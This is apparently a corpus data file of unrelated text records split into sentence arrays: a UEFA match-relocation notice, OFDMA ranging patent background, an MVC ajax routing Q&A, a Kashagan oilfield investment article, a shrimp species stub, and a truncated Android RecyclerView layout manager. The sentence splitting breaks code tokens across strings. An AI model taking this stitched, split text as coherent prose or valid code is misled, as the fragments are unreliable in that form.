stadium in Kiev tomorrow. ", "The decision concerns the match FC Vorskla and Arsenal FC.", "\n\n\"UEFA is also continuing its close collaboration with the FFU to examine all implications for holding matches in some parts of Ukraine in the immediate future. ", "UEFA will be sending senior security experts to Ukraine to further assess the situation and the potential impact on security for upcoming UEFA matches.", "\n\n\"UEFA regrets the inconvenience the relocation of this match has caused to supporters and FC Vorskla.\"", "\n\nArsenal have already secured qualification through to the last 32 of the competition." ]
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[ "There have been increasing demands for a system for supporting high-speed data transmission in a mobile communication environment. ", "In a mobile communication environment, each of terminals may be connected with a base station to transmit/receive high-speed data. ", "So that the terminal is connected with the base station to transmit/receive data, the terminal and the base station may be required to be synchronized.", "\nThe terminal may be synchronized with the base station based on preamble signals transmitted from the base station. ", "In general, a plurality of terminals may be connected with a single base station, and distances from the base station to each of the terminals may be different from each other. ", "Accordingly, a propagation delay time for each terminal may be different from each other. ", "The propagation delay time from the base station to the terminal may be not detected using only the preamble signals received from the base station.", "\nIn a communication system using an orthogonal frequency division multiple access (OFDMA) scheme, where a propagation delay time is greater than a predetermined time, interference between signals received from each of the terminals may occur. ", "Accordingly, a receiving performance of the base station may be deteriorated, and thus high-speed data transmission may not be achieved.", "\nRanging signals may be used in order to synchronize the base station and the terminal in an uplink of a data transmission system. ", "Each of the terminals may transmit the ranging signals to the base station, and the base station may measure the propagation delay time from the terminal to the base station, a frequency deviation, and the like, based on the ranging signals. ", "The base station may synchronize the base station with the terminal based on the measured propagation delay time.", "\nWhere the terminal is initially connected with the base station or performs a handover to a new base station, a ranging process may be performed.", "\nWhere a plurality of terminals intends to simultaneously perform the ranging process with respect to a specific base station, the ranging signals transmitted by each of the plurality of terminals may collide with each other. ", "In this case, the terminal may recognize the collision, and transmit new ranging signals.", "\nWhere a time required for performing the ranging process increases, an unnecessary load may be applied to the communication system, and a failure of the data transmission may occur. ", "Accordingly, there is a need for a ranging scheme that may increase a ranging success rate and reduce a ranging process time." ]
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[ "Q:\n\nWhen deploying MVC app on server ajax cant find action but Localhost it does\n\nI have a MVC5 application. ", "When I run it on my localhost everything works without any errors. ", "\nWhen I publish my app then I transfer it to Windows Server 2016, I put the files in wwwroot in the IIS folder and I link everything to create a new website in IIS. ", "I then run the website and it works. ", "I get my javascript code to work, but when I go and run my ‘ajax’ methods I get an 404 error and in the function I cannot find my controller action so the method will work. ", "\nHere is my actual error: \n\nxxx.xxx.xx x.219/Parts/DoPartBookFunc?bookval=8 404 (Not Found),\n Failed to load resource: the server responded with a status of 404\n (Not Found)\n\nI been researching and trying a bunch of different things, but so far no luck. ", "Some things I tried were \n\n@Url.action(“”,””)\nadding a ~ in front \nadding ../ in front \nmaking a global file \n\nand many other things. ", "If someone knows how to fix this it would be hugely appreciated.", "\n$(\"#PartBook\").on(\"change\", function () {\n var selectV = $(this).val();\n var selectT = $(this).text(); \n $.ajax({\n url: '/Parts/DoPartBookFunc',\n type: 'GET',\n dataType: 'json',\n data: { bookval: selectV },\n //contentType: 'application/json; charset=utf-8',\n success: function (data) {\n //alert(\"s\" + data.", "PartNextNumber);\n\nHere is my Solution everybody!", "\nChanged my ajax() url to:\nurl: \"@Url.", "Action(\"DoPartBookFunc\", \"Parts\")\",\n\n public static void RegisterRoutes(RouteCollection routes)\n {\n routes.", "IgnoreRoute(\"{resource}.axd/{*pathInfo}\");\n\n /* Newly Added */ \n routes.", "MapRoute(\n name: \"AddNewControllerName\",\n url: \"AddNewControllerName/{action}/{id}\",\n defaults: new { controller = \"AddNewControllerName\", action = \"Index\", id = UrlParameter.", "Optional }\n );\n\n /* Old Route */\n routes.", "MapRoute(\n name: \"mass\",\n url: \"{action}/{id}\",\n defaults: new { controller = \"Parts\", action = \"Index\", id = UrlParameter.", "Optional }\n ); \n\nA:\n\nTry removing / from the url:\n$(\"#PartBook\").on(\"change\", function () {\n var selectV = $(this).val();\n var selectT = $(this).text(); \n $.ajax({\n url: 'Parts/DoPartBookFunc',\n type: 'GET',\n dataType: 'json',\n data: { bookval: selectV },\n //contentType: 'application/json; charset=utf-8',\n success: function (data) {\n //alert(\"s\" + data.", "PartNextNumber);\n ...\n })\n\nor try adding this:\nvar RootUrl = '@Url.", "Content(\"~/\")';\n\n$.ajax({\ntype: \"POST\",\n url: RootUrl + \"Parts/DoPartBookFunc\",\n\n" ]
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[ "13 Billion Barrels of New Oil Plague the Petroleum Industry\n\nDespite efforts to change the way we use energy, we still need oil. ", "A lot of it.", "\n\nFortunately, the Kashagan oilfield -- the largest oil discovery in the past 30 years -- just started production. ", "Unfortunately for those involved in the project, it may not turn out to be as promising as originally thought. ", "Let's look at what this new discovery means to the companies that hope to turn a profit from it.", "\n\n\"Cash all gone\"\n\nSource: Eni S.p.", "A Media Relations.", "\n\nThe Kashagan field in the Caspian Sea has been one of the biggest cautionary tales for the future of oil. ", "While it holds a ton of promise with more than 13 billion barrels of recoverable oil, the project so far has been described as a boondoggle at best. ", "It took the consortium of companies working on the project more than 12 years to get the first drop of oil out of the ground. ", "Also, once the project hits its target capacity of 375,000 barrels per day, the costs will have swelled to more than $80,000 per barrel of capacity, which is more than 5 times what it costs for oil to come from places such as Saudi Arabia. ", "The extremely high costs on this project coupled with how long it has taken to bring online has given it the nickname \"Cash all gone.\"", "\n\nThere are two major reasons this project has struggled to get off the ground: technical challenges of the project and the highly technical term known as \"too many chefs in the kitchen.\" ", "Harsh winter conditions similar to exploring in the Arctic, an extremely high-pressure reservoir, and hydrogen sulfide levels high enough to kill a human in 30 seconds if a leak were to occur have made Kashagan quite possibly the most technically challenging oil field ever encountered.", "\n\nAlso, to comound these problems, there isn't a clear leader of the project that can steer its investment deicisions. ", "ExxonMobil (NYSE: XOM) , Royal Dutch Shell (NYSE: RDS-A) , Eni (NYSE: E) , Total (NYSE: TOT) , and Kazakh national oil company KazMunaiGas each have a 16.81% working interest in the project. ", "This has led to problems involving investment decisions and project mangement. ", "Both ExxonMobil and Royal Dutch Shell have been extremely disappointed with the results, to the point that they have threatened to pull out of the project altogether on a couple of occasions, and ConocoPhillips (NYSE: COP) did get out this year by selling its $5 billion stake in the project to China National Petroleum.", "\n\nA gusher of capital for a trickle of oilEven though the project plans to increase production to 1.5 million barrels per day sometime next decade, it's unlikely that having this project come online will have a significant impact on production numbers for any of the companies. ", "Right now, Eni, the company responsible for the first phase of development, believes the project will ramp up to 180,000 barrels per day and get to the 375,000 target, although dates are not completely certain. ", "That means that each of the companies I've mentioned here will net about 63,000 barrels per day once the first phase is operational, which is hardly going to move the needle for these companies. ", "Exxon's total production last quarter averaged more than 4 million barrels per day.", "\n\nWith almost $50 billion invested in the project so far and so little to show for it, the one way these companies will be able to make a decent return will be the project's extremely long time horizon. ", "Even if it ramps up to 1.5 million barrels per day, production at this field is expected to last for several decades, so down the road those big bucks invested today might seem worth it. ", "Exxon and Shell estimate that they will need to be involved in the project beyond 2040 to make a reasonable return on Kashagan.", "\n\nWhat a Fool believesFor investors looking at the companies involved in this project, Kashagan may end up being more of a burden than a blessing. ", "The government has hinted at terminating contracts in the event of an accident, which would translate to multibillion-dollar writedowns if any thing were to happen. ", "Also, each of these companies has projects in the pipeline that will have much more impact on the bottom line in the short to medium term. ", "In all reality, Kashagan may end up being more of a liability than a bankable asset. ", "It's still going to take several billions of dollars to get the project up to peak capacity, so we are still years away from seeing how profitable Kashagan really is.", "\n\nThe headaches involved in investing in overseas oil and gas projects make investing in the American energy boom that much more compelling. ", "The problem with investing here, though, is finding the companies that have the legs to stand the test of time. ", "For this reason, we have put together a comprehensive look at three energy companies set to soar during this transformation in the energy industry. ", "Let us help you discover these three companies that are spreading their wings by checking out our special report, \"3 Stocks for the American Energy Bonanza.\" ", "Simply click here and we'll give you free access to this valuable report.", "\n\nFool contributor Tyler Crowe has no position in any stocks mentioned. ", "You can follow Tyler at Fool.com under the handle TMFDirtyBird, on Google +, or on Twitter @TylerCroweFool.", "\n\nComments from our Foolish Readers\n\nHelp us keep this a respectfully Foolish area! ", "This is a place for our readers to discuss, debate, and learn more about the Foolish investing topic you read about above. ", "Help us keep it clean and safe. ", "If you believe a comment is abusive or otherwise violates our Fool's Rules, please report it via the Report this Comment icon found on every comment." ]
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[ "Alpheus novaezealandiae\n\nAlpheus novaezealandiae is a species of shrimp in the family Alpheidae, found in Australasia.", "\n\nA. novaezelandiae is found around the coasts of New Zealand, Lord Howe Island and Australia, where it lives under rocks from the intertidal zone to a depth of . ", "It is a large species, growing to a length of , and is dark in colouration.", "\n\nReferences\n\nCategory:Alpheidae\nCategory:Crustaceans described in 1876\nCategory:Taxa named by Edward J. Miers" ]
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[ "package com.forcelain.awesomelayoutmanager;\n\nimport android.animation.", "Animator;\nimport android.animation.", "ValueAnimator;\nimport android.graphics.", "PointF;\nimport android.graphics.", "Rect;\nimport android.support.annotation.", "Nullable;\nimport android.support.v7.widget.", "LinearSmoothScroller;\nimport android.support.v7.widget.", "RecyclerView;\nimport android.util.", "SparseArray;\nimport android.view.", "View;\nimport android.view.", "ViewGroup;\n\nimport java.util.", "ArrayList;\n\npublic class AwesomeLayoutManager extends RecyclerView.", "LayoutManager {\n\n public enum Orientation {VERTICAL, HORIZONTAL}\n\n private static final float SCALE_THRESHOLD_PERCENT = 0.66f;\n private static final int TRANSITION_DURATION_MS = 400;\n private static final float ITEM_HEIGHT_PERCENT = 0.75f;\n private RecyclerView recyclerView;\n private int scrollStartPos;\n private SparseArray<View> viewCache = new SparseArray<>();\n private Orientation orientation = Orientation.", "VERTICAL;\n private int anchorPos;\n private boolean pagination;\n private float scaleThreshold = SCALE_THRESHOLD_PERCENT;\n private float pageHeightFactor = ITEM_HEIGHT_PERCENT;\n private int transitionDuration = TRANSITION_DURATION_MS;\n private int offScreenPages = 0;\n\n /**\n * @see #setTransitionDuration(int)\n * @return animation's duration in milliseconds\n */\n public int getTransitionDuration() {\n return transitionDuration;\n }\n\n /**\n * Set the duration of animated transition between vertical and horizontal {@link Orientation}\n * @param transitionDuration animation's duration in milliseconds (400 by default)\n */\n public void setTransitionDuration(int transitionDuration) {\n this.transitionDuration = transitionDuration;\n }\n\n /**\n * @see #setPagination(boolean)\n * @return true if the AwesomeLayoutManager acts like a ViewPager,\n * false if the AwesomeLayoutManager acts like a ListView\n */\n public boolean isPagination() {\n return pagination;\n }\n\n /**\n * Set the AwesomeLayoutManager to act like a ViewPager or like a ListView\n * @param pagination true is for ViewPager behavior, false otherwise\n */\n public void setPagination(boolean pagination) {\n this.pagination = pagination;\n }\n\n /**\n * @see #setScaleFactor(float)\n * @return current scale factor\n */\n public float getScaleFactor() {\n return 1 - scaleThreshold;\n }\n\n /**\n * Set how much incoming views are scaled\n * @param scaleFactor is [0..1]. ", "0 - not scaled, 1 - maximum scaled\n */\n public void setScaleFactor(float scaleFactor) {\n this.scaleThreshold = 1 - scaleFactor;\n }\n\n /**\n * @see #setPageHeightFactor(float)\n * @return current page height factor\n */\n public float getPageHeightFactor() {\n return pageHeightFactor;\n }\n\n /**\n * Set the maximum page height as a percentage of the RecyclerView's height\n * @param pageHeightFactor in (0, 1]. ", "0.5 is for half-height, 1 is for full RecyclerView's height\n */\n public void setPageHeightFactor(float pageHeightFactor) {\n this.pageHeightFactor = pageHeightFactor;\n }\n\n public Orientation getOrientation() {\n return orientation;\n }\n\n /**\n * Change the orientation immediately (without animation)\n * @param orientation The {@link Orientation} to use\n */\n public void setOrientation(Orientation orientation) {\n View anchorView = getAnchorView();\n anchorPos = anchorView !", "= null ? ", "getPosition(anchorView) : 0;\n if (orientation !", "= null) {\n this.orientation = orientation;\n }\n requestLayout();\n }\n\n /**\n * Animated expand the page at the given position and change the orientation to Orientation.", "HORIZONTAL\n * @param pos Adapter's position to open\n */\n public void openItem(int pos) {\n if (orientation == Orientation.", "VERTICAL) {\n View viewToOpen = null;\n int childCount = getChildCount();\n for (int i = 0; i < childCount; i++) {\n View view = getChildAt(i);\n int position = getPosition(view);\n if (position == pos) {\n viewToOpen = view;\n }\n }\n if (viewToOpen !", "= null) {\n openView(viewToOpen);\n }\n }\n }\n\n /**\n * Animated collapse current page and change the orientation to Orientation.", "VERTICAL\n */\n public void close() {\n View targetView = getAnchorView();\n final ArrayList<ViewAnimationInfo> animationInfos = new ArrayList<>();\n int childCount = getChildCount();\n int targetPos = getPosition(targetView);\n for (int i = 0; i < childCount; i++) {\n View view = getChildAt(i);\n int pos = getPosition(view);\n if (pos < targetPos) {\n continue;\n }\n int posDelta = pos - targetPos;\n final ViewAnimationInfo viewAnimationInfo = new ViewAnimationInfo();\n int maxHeight = (int) (getHeight() * pageHeightFactor);\n if (animationInfos.isEmpty()) {\n viewAnimationInfo.startTop = getDecoratedTop(view);\n viewAnimationInfo.startBottom = getDecoratedBottom(view);\n viewAnimationInfo.finishTop = viewAnimationInfo.startTop;\n viewAnimationInfo.finishBottom = viewAnimationInfo.finishTop + Math.min(maxHeight, getDecoratedMeasuredHeight(view));\n } else {\n ViewAnimationInfo prevViewInfo = animationInfos.get(animationInfos.size() - 1);\n viewAnimationInfo.startTop = getHeight() * posDelta;\n viewAnimationInfo.startBottom = viewAnimationInfo.startTop + getHeight();\n viewAnimationInfo.finishTop = prevViewInfo.finishBottom;\n viewAnimationInfo.finishBottom = viewAnimationInfo.finishTop + Math.min(maxHeight, getDecoratedMeasuredHeight(view));\n }\n viewAnimationInfo.view = view;\n animationInfos.add(viewAnimationInfo);\n }\n ValueAnimator animator = ValueAnimator.ofFloat(0, 1);\n animator.setDuration(transitionDuration);\n animator.addUpdateListener(new ValueAnimator.", "AnimatorUpdateListener() {\n @Override\n public void onAnimationUpdate(ValueAnimator animation) {\n float animationProgress = (float) animation.getAnimatedValue();\n for (ViewAnimationInfo animationInfo : animationInfos) {\n int top = (int) (animationInfo.startTop + animationProgress * (animationInfo.finishTop - animationInfo.startTop));\n int bottom = (int) (animationInfo.startBottom + animationProgress * (animationInfo.finishBottom - animationInfo.startBottom));\n layoutDecorated(animationInfo.view, 0, top, getWidth(), bottom);\n notifyChildState(animationInfo.view, 1 - animationProgress);\n }\n updateViewScale();\n }\n });\n animator.addListener(new Animator.", "AnimatorListener() {\n @Override\n public void onAnimationStart(Animator animation) {\n }\n\n @Override\n public void onAnimationEnd(Animator animation) {\n setOrientation(Orientation.", "VERTICAL);\n }\n\n @Override\n public void onAnimationCancel(Animator animation) {\n }\n\n @Override\n public void onAnimationRepeat(Animator animation) {\n }\n });\n animator.start();\n\n }\n\n\n @Override\n public void onAttachedToWindow(final RecyclerView recyclerView) {\n super.onAttachedToWindow(recyclerView);\n\n this.recyclerView = recyclerView;\n\n recyclerView.setChildDrawingOrderCallback(new RecyclerView.", "ChildDrawingOrderCallback() {\n @Override\n public int onGetChildDrawingOrder(int childCount, int i) {\n return childCount - i - 1;\n }\n });\n\n recyclerView.setOnFlingListener(new RecyclerView.", "OnFlingListener() {\n @Override\n public boolean onFling(int velocityX, int velocityY) {\n if (!", "pagination) {\n return false;\n }\n int position = scrollStartPos;\n int velocity = 0;\n switch (orientation) {\n case VERTICAL:\n velocity = velocityY;\n break;\n case HORIZONTAL:\n velocity = velocityX;\n break;\n }\n position = velocity > 0 ? ", "position + 1 : position - 1;\n position = Math.max(position, 0);\n position = Math.min(position, getItemCount() - 1);\n recyclerView.smoothScrollToPosition(position);\n return true;\n }\n });\n }\n\n @Override\n public void onDetachedFromWindow(RecyclerView view, RecyclerView.", "Recycler recycler) {\n super.onDetachedFromWindow(view, recycler);\n recyclerView = null;\n }\n\n @Override\n public RecyclerView.", "LayoutParams generateDefaultLayoutParams() {\n return new RecyclerView.", "LayoutParams(ViewGroup.", "LayoutParams.", "MATCH_PARENT, ViewGroup.", "LayoutParams.", "WRAP_CONTENT);\n }\n\n @Override\n public void onLayoutChildren(RecyclerView.", "Recycler recycler, RecyclerView.", "State state) {\n detachAndScrapAttachedViews(recycler);\n fill(recycler);\n anchorPos = -1;\n }\n\n @Override\n public void onScrollStateChanged(int state) {\n super.onScrollStateChanged(state);\n if (!", "pagination) {\n return;\n }\n if (state == RecyclerView.", "SCROLL_STATE_DRAGGING) {\n scrollStartPos = getPosition(getAnchorView());\n }\n if (state == RecyclerView.", "SCROLL_STATE_IDLE) {\n switch (orientation) {\n case VERTICAL:\n checkLayoutVertical();\n break;\n case HORIZONTAL:\n checkLayoutHorizontal();\n break;\n }\n }\n\n }\n\n private void checkLayoutHorizontal() {\n View anchorView = getAnchorView();\n int left = getDecoratedLeft(anchorView);\n if (left !", "= 0) {\n recyclerView.smoothScrollBy(left, 0);\n }\n }\n\n private void checkLayoutVertical() {\n View anchorView = getAnchorView();\n int position = getPosition(anchorView);\n if (position !", "= 0 && position == getItemCount() - 1) {\n int bottom = getDecoratedBottom(anchorView);\n if (bottom !", "= getHeight()) {\n recyclerView.smoothScrollBy(0, bottom);\n }\n } else {\n int decoratedTop = getDecoratedTop(anchorView);\n if (decoratedTop !", "= 0) {\n recyclerView.smoothScrollBy(0, decoratedTop);\n }\n }\n }\n\n protected void openView(final View targetView) {\n final ArrayList<ViewAnimationInfo> animationInfos = new ArrayList<>();\n int childCount = getChildCount();\n int targetPos = getPosition(targetView);\n for (int i = 0; i < childCount; i++) {\n View view = getChildAt(i);\n int pos = getPosition(view);\n int posDelta = pos - targetPos;\n final ViewAnimationInfo viewAnimationInfo = new ViewAnimationInfo();\n viewAnimationInfo.startTop = getDecoratedTop(view);\n viewAnimationInfo.startBottom = getDecoratedBottom(view);\n viewAnimationInfo.finishTop = getHeight() * posDelta;\n viewAnimationInfo.finishBottom = viewAnimationInfo.finishTop + getDecoratedMeasuredHeight(targetView);\n viewAnimationInfo.view = view;\n animationInfos.add(viewAnimationInfo);\n }\n ValueAnimator animator = ValueAnimator.ofFloat(0, 1);\n animator.setDuration(transitionDuration);\n animator.addUpdateListener(new ValueAnimator.", "AnimatorUpdateListener() {\n @Override\n public void onAnimationUpdate(ValueAnimator animation) {\n float animationProgress = (float) animation.getAnimatedValue();\n for (ViewAnimationInfo animationInfo : animationInfos) {\n int top = (int) (animationInfo.startTop + animationProgress * (animationInfo.finishTop - animationInfo.startTop));\n int bottom = (int) (animationInfo.startBottom + animationProgress * (animationInfo.finishBottom - animationInfo.startBottom));\n layoutDecorated(animationInfo.view, 0, top, getWidth(), bottom);\n notifyChildState(animationInfo.view, animationProgress);\n }\n updateViewScale();\n }\n });\n animator.addListener(new Animator.", "AnimatorListener() {\n @Override\n public void onAnimationStart(Animator animation) {\n }\n\n @Override\n public void onAnimationEnd(Animator animation) {\n setOrientation(Orientation.", "HORIZONTAL);\n }\n\n @Override\n public void onAnimationCancel(Animator animation) {\n }\n\n @Override\n public void onAnimationRepeat(Animator animation) {\n }\n });\n animator.start();\n }\n\n private float map(float x1, float x2, float y1, float y2, float n) {\n return (n - x1) * (y2 - y1) / (x2 - x1) + y1;\n }\n\n private void fill(RecyclerView.", "Recycler recycler) {\n offScreenPages = (int) (getHeight() / pageHeightFactor);\n View anchorView = getAnchorView();\n viewCache.clear();\n for (int i = 0, cnt = getChildCount(); i < cnt; i++) {\n View view = getChildAt(i);\n int pos = getPosition(view);\n viewCache.put(pos, view);\n }\n\n for (int i = 0; i < viewCache.size(); i++) {\n detachView(viewCache.valueAt(i));\n }\n\n switch (orientation) {\n\n case VERTICAL:\n fillUp(anchorView, recycler);\n fillDown(anchorView, recycler);\n break;\n case HORIZONTAL:\n fillLeft(anchorView, recycler);\n fillRight(anchorView, recycler);\n break;\n }\n\n for (int i = 0; i < viewCache.size(); i++) {\n recycler.recycleView(viewCache.valueAt(i));\n }\n\n updateViewScale();\n }\n\n private void fillUp(@Nullable View anchorView, RecyclerView.", "Recycler recycler) {\n int anchorPos;\n int anchorTop = 0;\n\n if (this.anchorPos >= 0) {\n anchorPos = this.anchorPos;\n } else if (anchorView == null) {\n anchorPos = 0;\n } else {\n anchorPos = getPosition(anchorView);\n anchorTop = getDecoratedTop(anchorView);\n }\n\n boolean fillUp = true;\n int pos = anchorPos - 1;\n int viewBottom = anchorTop;\n int viewHeight = (int) (getHeight() * pageHeightFactor);\n final int widthSpec = View.", "MeasureSpec.makeMeasureSpec(getWidth(), View.", "MeasureSpec.", "EXACTLY);\n final int heightSpec = View.", "MeasureSpec.makeMeasureSpec(getHeight(), View.", "MeasureSpec.", "AT_MOST);\n while (fillUp && pos >= 0) {\n View view = viewCache.get(pos);\n if (view == null) {\n view = recycler.getViewForPosition(pos);\n addView(view, 0);\n measureChildWithDecorationsAndMargin(view, widthSpec, heightSpec);\n int decoratedMeasuredWidth = getDecoratedMeasuredWidth(view);\n layoutDecorated(view, 0, viewBottom - Math.min(viewHeight, getDecoratedMeasuredHeight(view)), decoratedMeasuredWidth, viewBottom);\n } else {\n attachView(view, 0);\n viewCache.remove(pos);\n }\n notifyChildState(view, 0);\n viewBottom = getDecoratedTop(view);\n fillUp = (viewBottom > 0);\n pos--;\n }\n }\n\n private void fillDown(@Nullable View anchorView, RecyclerView.", "Recycler recycler) {\n int anchorPos;\n int anchorTop = 0;\n\n if (this.anchorPos >= 0) {\n anchorPos = this.anchorPos;\n } else if (anchorView == null) {\n anchorPos = 0;\n } else {\n anchorPos = getPosition(anchorView);\n anchorTop = getDecoratedTop(anchorView);\n }\n\n int pos = anchorPos;\n boolean fillDown = true;\n int height = getHeight();\n int viewTop = anchorTop;\n int itemCount = getItemCount();\n int viewHeight = (int) (getHeight() * pageHeightFactor);\n final int widthSpec = View.", "MeasureSpec.makeMeasureSpec(getWidth(), View.", "MeasureSpec.", "EXACTLY);\n final int heightSpec = View.", "MeasureSpec.makeMeasureSpec(getHeight(), View.", "MeasureSpec.", "AT_MOST);\n\n while (fillDown && pos < itemCount) {\n View view = viewCache.get(pos);\n if (view == null) {\n view = recycler.getViewForPosition(pos);\n addView(view);\n measureChildWithDecorationsAndMargin(view, widthSpec, heightSpec);\n int decoratedMeasuredWidth = getDecoratedMeasuredWidth(view);\n layoutDecorated(view, 0, viewTop, decoratedMeasuredWidth, viewTop + Math.min(viewHeight, getDecoratedMeasuredHeight(view)));\n } else {\n attachView(view);\n viewCache.remove(pos);\n }\n notifyChildState(view, 0);\n viewTop = getDecoratedBottom(view);\n fillDown = viewTop <= height;\n pos++;\n }\n }\n\n private void fillLeft(@Nullable View anchorView, RecyclerView.", "Recycler recycler) {\n int anchorPos;\n int anchorLeft = 0;\n if (this.anchorPos >= 0) {\n anchorPos = this.anchorPos;\n } else if (anchorView == null) {\n anchorPos = 0;\n } else {\n anchorPos = getPosition(anchorView);\n anchorLeft = getDecoratedLeft(anchorView);\n }\n\n int pos = anchorPos - 1;\n int nextViewRight = anchorLeft;\n int width = getWidth();\n boolean fillLeft = canFillLeft(nextViewRight, width);\n int height = getHeight();\n final int widthSpec = View.", "MeasureSpec.makeMeasureSpec(width, View.", "MeasureSpec.", "EXACTLY);\n final int heightSpec = View.", "MeasureSpec.makeMeasureSpec(height, View.", "MeasureSpec.", "AT_MOST);\n while (fillLeft && pos >= 0) {\n View view = viewCache.get(pos);\n if (view == null) {\n view = recycler.getViewForPosition(pos);\n addView(view, 0);\n measureChildWithDecorationsAndMargin(view, widthSpec, heightSpec);\n int decoratedMeasuredHeight = getDecoratedMeasuredHeight(view);\n int decoratedMeasuredWidth = getDecoratedMeasuredWidth(view);\n layoutDecorated(view, nextViewRight - decoratedMeasuredWidth, 0, nextViewRight, decoratedMeasuredHeight);\n } else {\n attachView(view);\n viewCache.remove(pos);\n }\n notifyChildState(view, 1);\n nextViewRight = getDecoratedLeft(view);\n fillLeft = canFillLeft(nextViewRight, width);\n pos--;\n }\n }\n\n private boolean canFillLeft(int nextViewRight, int width) {\n return nextViewRight > -width * offScreenPages;\n }\n\n private void fillRight(View anchorView, RecyclerView.", "Recycler recycler) {\n int anchorPos;\n int anchorLeft = 0;\n if (this.anchorPos >= 0) {\n anchorPos = this.anchorPos;\n } else if (anchorView == null) {\n anchorPos = 0;\n } else {\n anchorPos = getPosition(anchorView);\n anchorLeft = getDecoratedLeft(anchorView);\n }\n\n int pos = anchorPos;\n boolean fillRight = true;\n int nextViewLeft = anchorLeft;\n int itemCount = getItemCount();\n int width = getWidth();\n int height = getHeight();\n final int widthSpec = View.", "MeasureSpec.makeMeasureSpec(width, View.", "MeasureSpec.", "EXACTLY);\n final int heightSpec = View.", "MeasureSpec.makeMeasureSpec(height, View.", "MeasureSpec.", "AT_MOST);\n\n while (fillRight && pos < itemCount) {\n View view = viewCache.get(pos);\n if (view == null) {\n view = recycler.getViewForPosition(pos);\n addView(view);\n measureChildWithDecorationsAndMargin(view, widthSpec, heightSpec);\n int decoratedMeasuredHeight = getDecoratedMeasuredHeight(view);\n int decoratedMeasuredWidth = getDecoratedMeasuredWidth(view);\n layoutDecorated(view, nextViewLeft, 0, nextViewLeft + decoratedMeasuredWidth, decoratedMeasuredHeight);\n } else {\n attachView(view);\n viewCache.remove(pos);\n }\n notifyChildState(view, 1);\n nextViewLeft = getDecoratedRight(view);\n fillRight = nextViewLeft < width + width * offScreenPages;\n pos++;\n }\n }\n\n private void notifyChildState(View view, float progress) {\n RecyclerView.", "ViewHolder childViewHolder = recyclerView.getChildViewHolder(view);\n if (childViewHolder instanceof AwesomeViewHolder) {\n ((AwesomeViewHolder) childViewHolder).onStateChanged(progress);\n }\n }\n\n private void updateViewScale() {\n int childCount = getChildCount();\n int height = getHeight();\n int thresholdPerc = (int) (height * scaleThreshold);\n for (int i = 0; i < childCount; i++) {\n float scale = 1f;\n View view = getChildAt(i);\n int viewTop = getDecoratedTop(view);\n if (viewTop >= thresholdPerc) {\n int delta = viewTop - thresholdPerc;\n scale = (height - delta) / (float) height;\n scale = Math.max(scale, 0);\n }\n int pivotY = (int) map(thresholdPerc, height, getHeight() / -2, 0, viewTop);\n view.setPivotX(view.getWidth() / 2);\n view.setPivotY(pivotY);\n view.setScaleX(scale);\n view.setScaleY(scale);\n }\n }\n\n protected View getAnchorView() {\n int childCount = getChildCount();\n Rect mainRect = new Rect(0, 0, getWidth(), getHeight());\n int maxSquare = 0;\n View anchorView = null;\n for (int i = 0; i < childCount; i++) {\n View view = getChildAt(i);\n int top = getDecoratedTop(view);\n int bottom = getDecoratedBottom(view);\n int left = getDecoratedLeft(view);\n int right = getDecoratedRight(view);\n Rect viewRect = new Rect(left, top, right, bottom);\n boolean intersect = viewRect.intersect(mainRect);\n if (intersect) {\n int square = viewRect.width() * viewRect.height();\n if (square > maxSquare) {\n maxSquare = square;\n anchorView = view;\n }\n }\n }\n return anchorView;\n }\n\n @Override\n public void smoothScrollToPosition(RecyclerView recyclerView, RecyclerView.", "State state, int position) {\n if (position >= getItemCount()) {\n return;\n }\n\n LinearSmoothScroller scroller = new LinearSmoothScroller(recyclerView.getContext()) {\n @Override\n public PointF computeScrollVectorForPosition(int targetPosition) {\n return AwesomeLayoutManager.this.computeScrollVectorForPosition(targetPosition);\n }\n\n @Override\n protected int getHorizontalSnapPreference() {\n return SNAP_TO_START;\n }\n\n @Override\n protected int getVerticalSnapPreference() {\n return SNAP_TO_START;\n }\n };\n scroller.setTargetPosition(position);\n startSmoothScroll(scroller);\n }\n\n private PointF computeScrollVectorForPosition(int targetPosition) {\n if (getChildCount() == 0) {\n return null;\n }\n final int firstChildPos = getPosition(getChildAt(0));\n final int direction = targetPosition < firstChildPos ? ", "-1 : 1;\n if (orientation == Orientation.", "HORIZONTAL) {\n return new PointF(direction, 0);\n } else {\n return new PointF(0, direction);\n }\n }\n\n @Override\n public boolean canScrollVertically() {\n return orientation == Orientation.", "VERTICAL;\n }\n\n @Override\n public boolean canScrollHorizontally() {\n return orientation == Orientation.", "HORIZONTAL;\n }\n\n @Override\n public int scrollHorizontallyBy(int dx, RecyclerView.", "Recycler recycler, RecyclerView.", "State state) {\n int delta = scrollHorizontallyInternal(dx);\n offsetChildrenHorizontal(-delta);\n fill(recycler);\n return delta;\n }\n\n @Override\n public int scrollVerticallyBy(int dy, RecyclerView.", "Recycler recycler, RecyclerView.", "State state) {\n int delta = scrollVerticallyInternal(dy);\n offsetChildrenVertical(-delta);\n fill(recycler);\n return delta;\n }\n\n @Override\n public void scrollToPosition(int position) {\n super.scrollToPosition(position);\n anchorPos = position;\n requestLayout();\n }\n\n private int scrollVerticallyInternal(int dy) {\n int childCount = getChildCount();\n int itemCount = getItemCount();\n if (childCount == 0) {\n return 0;\n }\n\n final View topView = getChildAt(0);\n final View bottomView = getChildAt(childCount - 1);\n\n int viewSpan = getDecoratedBottom(bottomView) - getDecoratedTop(topView);\n if (viewSpan <= getHeight()) {\n return 0;\n }\n\n int delta = 0;\n if (dy < 0) {\n View firstView = getChildAt(0);\n int firstViewAdapterPos = getPosition(firstView);\n if (firstViewAdapterPos > 0) {\n delta = dy;\n } else {\n int viewTop = getDecoratedTop(firstView);\n delta = Math.max(viewTop, dy);\n }\n } else if (dy > 0) {\n View lastView = getChildAt(childCount - 1);\n int lastViewAdapterPos = getPosition(lastView);\n if (lastViewAdapterPos < itemCount - 1) {\n delta = dy;\n } else {\n int viewBottom = getDecoratedBottom(lastView);\n int parentBottom = getHeight();\n delta = Math.min(viewBottom - parentBottom, dy);\n }\n }\n return delta;\n }\n\n private int scrollHorizontallyInternal(int dx) {\n int childCount = getChildCount();\n int itemCount = getItemCount();\n if (childCount == 0) {\n return 0;\n }\n int delta = 0;\n if (dx < 0) {\n View firstView = getChildAt(0);\n int firstViewAdapterPos = getPosition(firstView);\n if (firstViewAdapterPos > 0) {\n delta = dx;\n } else {\n int viewLeft = getDecoratedLeft(firstView);\n delta = Math.max(viewLeft, dx);\n }\n } else if (dx > 0) {\n View lastView = getChildAt(childCount - 1);\n int lastViewAdapterPos = getPosition(lastView);\n if (lastViewAdapterPos < itemCount - 1) {\n delta = dx;\n } else {\n int viewRight = 